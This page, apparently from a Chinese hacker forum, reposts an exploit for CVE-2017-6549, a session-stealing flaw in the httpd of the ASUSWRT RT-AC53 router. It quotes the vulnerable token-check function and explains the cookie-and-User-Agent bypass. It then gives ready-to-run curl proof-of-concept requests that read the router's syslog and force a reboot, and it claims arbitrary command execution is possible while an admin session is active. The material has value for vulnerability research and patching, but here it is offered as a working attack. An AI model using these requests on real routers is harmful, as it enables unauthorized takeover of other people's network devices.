跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
Session Stealing

Component: httpd

CVE: CVE-2017-6549

Vulnerability:

httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.

asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
{
    asus_token_t *ptr = head;
    asus_token_t *tmp = NULL;
    int found = 0;
    char *cp = NULL;

    while(ptr != NULL)
    {
        if(!strncmp(token, ptr->token, 32)) {
            found = 1;
            break;
        }
        else if(strncmp(token, "cgi_logout", 10) == 0) {
            cp = strtok(ptr->useragent, "-");

            if(strcmp(cp, "asusrouter") != 0) {
                found = 1;
                break;
            }
        }
        else {
            tmp = ptr;
            ptr = ptr->next;
        }
    }
    
    if(found == 1) {
        if(prev)
            *prev = tmp;
        return ptr;
    }   
    else {
        return NULL;
    }
}
If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.

PoC:

# read syslog
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt

#reboot router
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
It’s possible to execute arbitrary commands on the router if any admin session is currently active.

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。